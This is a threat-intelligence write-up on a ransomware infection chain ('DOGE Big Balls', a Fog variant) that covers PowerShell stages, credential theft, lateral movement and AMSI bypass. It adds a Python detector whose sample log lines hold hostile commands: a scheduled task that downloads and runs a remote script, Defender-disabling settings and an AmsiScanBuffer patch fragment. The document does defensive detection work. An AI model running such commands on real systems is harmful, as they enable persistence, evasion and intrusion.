
Netskope Threat Labs has recently uncovered a multi-stage infection chain involving custom PowerShell scripts, open-source tools, exploitation of vulnerable drivers, and red team framework payloads, revealing the arsenal of a ransomware operation known as “DOGE Big Balls,” a variant of the Fog ransomware.
The ransomware's name is a provocative reference to the Department of Government Efficiency (DOGE), and its payloads carry political statements and provocations, including references to public figures and YouTube videos.
The infection sequence begins with an MSI file named payload.msi; initial access most likely comes through phishing emails or exploitation of vulnerable services. The MSI file executes a PowerShell script which, once decoded, checks for administrator access, creates a link file in the Windows Startup directory so that it runs at each user login, and establishes a scheduled task to download and execute the next-stage script.
The stage1.ps1 script downloads and executes multiple files and scripts from a main URL, creating a hidden directory in the Windows Startup folder.
This version of the script attempts to disable Windows Defender protections and establishes persistence through a Registry Run key entry. It downloads and attempts to execute several files, including cwiper.exe, ktool.exe, and others, with later versions delivering the DOGE Big Balls ransomware.
Scripts such as pivot.ps1 and dcstage1.ps1 handle lateral movement and target Domain Controllers, using tools such as Mimikatz and Rubeus to harvest credentials and move across the network. The worm.ps1 script establishes persistence and spreads to other machines, while ztinstall.ps1 installs ZeroTier to give the attacker remote access.
The attackers utilize techniques to evade detection, such as bypassing the Antimalware Scan Interface (AMSI) by patching the “AmsiScanBuffer” function. Some scripts also download and execute payloads, such as Cobalt Strike beacons, to maintain access and control over the compromised systems.
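The persistence and evasion behaviours described above (a link file dropped into the Startup folder and a scheduled task that fetches a script, a Registry Run key entry together with Defender tampering, and a script block that patches AmsiScanBuffer) all leave footprints in standard Windows telemetry. The detector below is an added example written for this page, not code from Netskope Threat Labs or from the campaign; it runs a handful of rules over constructed, simplified Sysmon-style and PowerShell script-block log lines (the paths, task name, user, SID and URL are invented placeholders) and reports which line triggered which rule.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Constructed sample telemetry (not from the Netskope report) in a simplified
# "key=value|key=value" form modelled on Sysmon events (1 = process create,
# 11 = file create, 13 = registry value set) and PowerShell script-block
# logging (event 4104). Every path, name and URL here is an invented placeholder.
SAMPLE_EVENTS = [
    r"EventID=11|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|TargetFilename=C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk",
    r"EventID=13|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|TargetObject=HKU\S-1-5-21-EXAMPLE\Software\Microsoft\Windows\CurrentVersion\Run\svchelper"
    r"|Details=powershell -w hidden -f C:\Users\alice\AppData\Roaming\stage1.ps1",
    r"EventID=1|Image=C:\Windows\System32\schtasks.exe"
    r"""|CommandLine=schtasks /create /tn Updater /sc minute /mo 30 /tr "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1'))" /f""",
    r"EventID=4104|ScriptBlockText=Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\Users",
    r"EventID=4104|ScriptBlockText=$p=GetProcAddress($amsi,'AmsiScanBuffer'); VirtualProtect($p,6,0x40,[ref]$o)",
    r"EventID=1|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe C:\Users\alice\notes.txt",
]

# Indicators, each tied to one behaviour from the infection chain.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.I)
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|https?://", re.I)
DEFENDER_TAMPER = re.compile(r"(Set|Add)-MpPreference\s+-(Disable\w+|Exclusion\w+)", re.I)
AMSI_PATCH = re.compile(r"AmsiScanBuffer", re.I)
MEMORY_WRITE = re.compile(r"VirtualProtect|WriteProcessMemory|Marshal\]::Copy", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    index: int      # position of the matching line in the input list
    evidence: str   # the field value that triggered the rule


def parse_event(line: str) -> Dict[str, str]:
    """Split 'key=value|key=value' into a dict; only the first '=' of each field separates key from value."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return fields


def startup_lnk(e: Dict[str, str]) -> Optional[str]:
    """Link file written into a user's Startup folder (executes at logon)."""
    target = e.get("TargetFilename", "")
    return target if e.get("EventID") == "11" and STARTUP_DIR.search(target) else None


def run_key(e: Dict[str, str]) -> Optional[str]:
    """Value written under a Run/RunOnce key (logon persistence)."""
    target = e.get("TargetObject", "")
    return target if e.get("EventID") == "13" and RUN_KEY.search(target) else None


def schtask_download(e: Dict[str, str]) -> Optional[str]:
    """schtasks /create whose action fetches content from the network."""
    cmd = e.get("CommandLine", "")
    ok = (e.get("EventID") == "1"
          and e.get("Image", "").lower().endswith("schtasks.exe")
          and "/create" in cmd.lower()
          and DOWNLOAD.search(cmd))
    return cmd if ok else None


def defender_tamper(e: Dict[str, str]) -> Optional[str]:
    """Script block that disables Defender features or adds exclusions."""
    text = e.get("ScriptBlockText", "")
    return text if e.get("EventID") == "4104" and DEFENDER_TAMPER.search(text) else None


def amsi_patch(e: Dict[str, str]) -> Optional[str]:
    """Script block naming AmsiScanBuffer alongside a memory-write primitive."""
    text = e.get("ScriptBlockText", "")
    ok = e.get("EventID") == "4104" and AMSI_PATCH.search(text) and MEMORY_WRITE.search(text)
    return text if ok else None


RULES: Dict[str, Callable[[Dict[str, str]], Optional[str]]] = {
    "startup_lnk": startup_lnk,
    "run_key": run_key,
    "schtask_download": schtask_download,
    "defender_tamper": defender_tamper,
    "amsi_patch": amsi_patch,
}


def detect(lines: List[str]) -> List[Finding]:
    """Run every rule over every line and return one Finding per (line, rule) hit."""
    findings: List[Finding] = []
    for i, line in enumerate(lines):
        event = parse_event(line)
        for name, rule in RULES.items():
            evidence = rule(event)
            if evidence:
                findings.append(Finding(name, i, evidence[:120]))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] line {f.index}: {f.evidence}")
```

Each rule keys on the combination of event type and artefact rather than on a file name, because the report notes that payload names and download URLs changed frequently while the persistence mechanisms stayed the same; the AMSI rule deliberately requires both the function name and a memory-write primitive so that ordinary scripts that merely mention AMSI do not fire it.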
Netskope Labs’ investigation revealed frequent updates to payloads and download URLs, with attackers adding scripts to create administrator accounts and ensure continuous execution of malicious payloads.